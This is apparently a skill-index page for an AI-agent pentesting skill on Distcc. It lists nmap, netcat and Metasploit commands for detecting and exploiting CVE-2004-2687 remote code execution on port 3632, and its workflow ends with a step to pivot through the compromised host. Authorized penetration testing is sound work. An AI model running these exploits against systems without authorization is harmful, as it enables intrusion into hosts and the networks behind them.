OpenSkillIndex← back to search

Hacktricks-skills distcc-pentest

How to identify and exploit Distcc vulnerabilities on port 3632. Use this skill whenever the user mentions Distcc, port 3632, distributed compilation, or needs to test for CVE-2004-2687. Make sure to use this skill for any network service enumeration that reveals port 3632, or when the user wants to check for remote code execution via Distcc misconfigurations.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/3632-pentesting-distcc/SKILL.MD
source content

Distcc Pentesting

A skill for identifying and exploiting Distcc vulnerabilities, particularly CVE-2004-2687 which allows remote code execution.

What is Distcc?

Distcc is a distributed compilation tool that uses idle processing power from other computers on the network. When misconfigured, it can allow attackers to execute arbitrary code on the target system.

Default port: 3632/tcp

When to Use This Skill

Use this skill when:

  • Port 3632 is open during network enumeration
  • You need to test for Distcc vulnerabilities
  • You want to check for CVE-2004-2687
  • You're assessing distributed compilation services
  • You need to verify if a Distcc daemon is vulnerable to RCE

Quick Start

1. Identify Distcc Service

# Check if port 3632 is open
nmap -p 3632 <target-ip>

# Banner grab to confirm Distcc
nc -v <target-ip> 3632

2. Test for CVE-2004-2687

This vulnerability allows arbitrary command execution on the Distcc server.

Using Nmap script:

nmap -p 3632 <target-ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Using Metasploit:

msfconsole
use exploit/unix/misc/distcc_exec
set RHOSTS <target-ip>
set PAYLOAD <payload>
exploit

3. Manual Exploitation

If you don't have Metasploit, you can test manually:

# Test if the service accepts commands
echo "id" | nc <target-ip> 3632

# Try to compile a test file (if vulnerable)
distcc -m <target-ip> --show-version

Exploitation Workflow

  1. Enumerate: Confirm port 3632 is open and running Distcc
  2. Test: Run the CVE-2004-2687 check to see if it's vulnerable
  3. Exploit: If vulnerable, use Metasploit or manual methods to gain code execution
  4. Pivot: Use the compromised host for further network access

Important Notes

  • CVE-2004-2687 is the primary vulnerability to check for
  • The vulnerability allows arbitrary command execution
  • Many older systems still have this vulnerability unpatched
  • Distcc is often found in development environments
  • Always have proper authorization before testing

Resources

Common Commands Reference

# Quick vulnerability check
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

# Full scan with service detection
nmap -sV -p 3632 <ip>

# Metasploit exploitation
msfconsole -q -x "use exploit/unix/misc/distcc_exec; set RHOSTS <ip>; exploit"

Safety & Authorization

⚠️ Always ensure you have explicit authorization before testing Distcc services. Unauthorized exploitation of Distcc vulnerabilities is illegal and can result in severe legal consequences.

This skill is intended for:

  • Authorized penetration testing engagements
  • Security assessments with written permission
  • Educational purposes in controlled environments
  • Bug bounty programs where Distcc is in scope